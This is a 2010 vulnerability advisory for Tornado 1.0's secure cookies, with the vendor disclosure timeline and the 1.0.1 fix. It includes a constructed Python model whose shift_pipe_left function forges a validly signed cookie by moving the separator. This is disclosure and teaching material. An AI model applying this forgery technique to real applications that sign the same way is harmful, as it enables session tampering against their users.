Date: Mon, 16 Aug 2010 11:31:17 +0700
From: Nam Nguyen <>
Subject: Insecure secure cookie in Tornado


:Title: Insecure secure cookie in Tornado
:Severity: Low
:Reporter: Blue Moon Consulting
:Products: Tornado v1.0
:Fixed in: Tornado v1.0.1


Tornado is an open source version of the scalable, non-blocking web server and tools that power FriendFeed.

A secure cookie in Tornado is stored in three parts, separated by a pipe sign (``|``)::

  <value>|<timestamp>|<hmac>

<value>
  is the cookie's value encoded in Base64, an alphabet that includes the digits 0 to 9.

<timestamp>
  is ``str(int(time.time()))``.

<hmac>
  is the keyed hash value of <value> and <timestamp> concatenated, with no separator between them.

The problem is that ``get_secure_cookie`` only rejects timestamps that are too old, and the <hmac> is computed over <value> and <timestamp> concatenated with no separator, so the signature does not fix where one part ends and the other begins. An attacker can therefore move the pipe sign to the left by one or more 4-character blocks (a Base64 block boundary) to obtain another cookie with a valid <hmac>, whose timestamp lies far in the future and whose value is truncated by 3 bytes per block. Because the moved characters must parse as part of the timestamp, the attack requires the last Base64 block(s) of <value> to consist entirely of digits.

This vulnerability is rated at low severity because exploitation is situational: it depends on the victim's Base64-encoded cookie value ending in a block of digits.
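To make the shift concrete, here is a small model of the scheme written for this advisory; it is not Tornado's own code. ``cookie_signature`` hashes <value> and <timestamp> with no separator, ``get_secure_cookie_v1_0`` checks only for an expired timestamp as described above, ``get_secure_cookie_v1_0_1`` adds a future-timestamp check, and ``shift_pipe_left`` is the attacker's move. The secret, the fixed clock ``NOW``, the 31-day ``MAX_AGE``, the leading-zero check and the victim value are all constructed for the example.

```python
import base64
import hashlib
import hmac

# Constructed model of the cookie scheme the advisory describes; not Tornado's code.
SECRET = b"constructed-example-secret"  # stand-in for the application's cookie secret
MAX_AGE = 31 * 86400                     # assumed maximum cookie age, in seconds
NOW = 1281900000                         # fixed "current time" (Aug 2010) for determinism


def cookie_signature(secret: bytes, *parts: str) -> str:
    """Keyed hash over the bare concatenation of the parts, with no separator.

    This is the flaw: value+timestamp is hashed as one string, so moving the
    boundary between them does not change the result.
    """
    h = hmac.new(secret, digestmod=hashlib.sha1)
    for part in parts:
        h.update(part.encode("ascii"))
    return h.hexdigest()


def create_secure_cookie(secret: bytes, value: bytes, now: int = NOW) -> str:
    """Serialise as <value>|<timestamp>|<hmac>, with <value> Base64-encoded."""
    b64 = base64.b64encode(value).decode("ascii")
    ts = str(int(now))
    return "|".join([b64, ts, cookie_signature(secret, b64, ts)])


def _verify(secret: bytes, cookie: str, now: int, reject_future: bool):
    parts = cookie.split("|")
    if len(parts) != 3:
        return None
    b64, ts, sig = parts
    if not hmac.compare_digest(sig, cookie_signature(secret, b64, ts)):
        return None
    if not ts.isdigit():
        return None
    timestamp = int(ts)
    if timestamp < now - MAX_AGE:        # the only timestamp check in the 1.0 model
        return None
    if reject_future:
        if timestamp > now + MAX_AGE:    # the check the advisory says 1.0.1 adds
            return None
        # Assumption beyond the advisory: a shifted block of "0000" leaves
        # int(ts) unchanged, so a leading zero is refused as well.
        if ts.startswith("0"):
            return None
    return base64.b64decode(b64), timestamp


def get_secure_cookie_v1_0(secret: bytes, cookie: str, now: int = NOW):
    """Verifier behaving as the advisory describes Tornado 1.0."""
    return _verify(secret, cookie, now, reject_future=False)


def get_secure_cookie_v1_0_1(secret: bytes, cookie: str, now: int = NOW):
    """Verifier with the timestamp sanity checks."""
    return _verify(secret, cookie, now, reject_future=True)


def shift_pipe_left(cookie: str, blocks: int = 1) -> str:
    """Attacker's move: relocate the first '|' left by 4*blocks characters.

    value+timestamp is unchanged, so the signature still matches; the moved
    Base64 characters now head the timestamp and the value loses 3 bytes per block.
    """
    b64, ts, sig = cookie.split("|")
    n = 4 * blocks
    return "|".join([b64[:-n], b64[-n:] + ts, sig])


def trailing_digit_blocks(value: bytes) -> int:
    """Count trailing 4-character Base64 blocks made only of digits.

    The shifted characters must parse as part of the timestamp, so the attack
    works for at most this many blocks: the situational condition.
    """
    b64 = base64.b64encode(value).decode("ascii")
    count = 0
    while len(b64) >= 4 and b64[-4:].isdigit():
        count += 1
        b64 = b64[:-4]
    return count


# Constructed victim value: 9 ASCII bytes followed by 3 bytes whose Base64
# encoding is "9999" (each 6-bit group is 61, the index of '9').
VICTIM_VALUE = b"uid=12345" + b"\xf7\xdf\x7d"


def run_demo(secret: bytes = SECRET, value: bytes = VICTIM_VALUE, now: int = NOW) -> dict:
    cookie = create_secure_cookie(secret, value, now)
    forged = shift_pipe_left(cookie)
    return {
        "cookie": cookie,
        "forged": forged,
        "original": get_secure_cookie_v1_0(secret, cookie, now),
        "forged_v1_0": get_secure_cookie_v1_0(secret, forged, now),
        "forged_v1_0_1": get_secure_cookie_v1_0_1(secret, forged, now),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result!r}")
```

Run as-is and the forged cookie verifies under the 1.0 rules with timestamp 99991281900000 (far in the future) and the value shortened by 3 bytes, while the 1.0.1 rules reject it. One caveat a practitioner should keep in mind: a trailing block that encodes as "0000" shifts into the timestamp without changing its integer value, so the future-timestamp check alone does not catch that case; refusing a leading zero, or signing the serialised string including the separators, closes it.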


There is no workaround.


Customers are advised to upgrade to at least version 1.0.1.


Blue Moon Consulting follows RFPolicy v2.0 when notifying vendors.

:Initial vendor contact:

  August 13, 2010: Notice sent to Ben Darnell.

:Vendor response:

  August 13, 2010: Ben replied confirming the bug.

:Further communication:

  August 13, 2010: Ben added that the attacker would have to shift by 4 digits due to Base64 encoding.
  August 13, 2010: Ben added that version 1.0.1 would have a timestamp check.

:Public disclosure: August 16, 2010

:Exploit code:

  No exploit code required.


The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

Blue Moon Consulting Co., Ltd
